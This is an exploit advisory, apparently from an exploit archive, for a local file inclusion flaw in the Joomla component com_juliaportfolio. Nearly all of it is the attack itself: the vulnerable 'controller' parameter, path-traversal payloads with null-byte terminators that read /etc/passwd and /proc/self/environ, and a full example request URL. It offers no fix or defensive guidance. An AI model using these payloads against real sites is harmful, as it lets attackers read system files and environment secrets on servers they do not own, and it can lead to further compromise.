id: 9646
date: 03/13/2010
title: Joomla Component com_juliaportfolio Local File Inclusion Vulnerability
author: DevilZ TM
cves: 

======================================================================
Joomla Component com_juliaportfolio Local File Inclusion Vulnerability
======================================================================

[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_juliaportfolio&controller=[LFI]
  
[~] ExploiT         :
  
../../../../../../../../../../etc/passwd%00
 
../../../../../../../../../../proc/self/environ%00
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-27]  #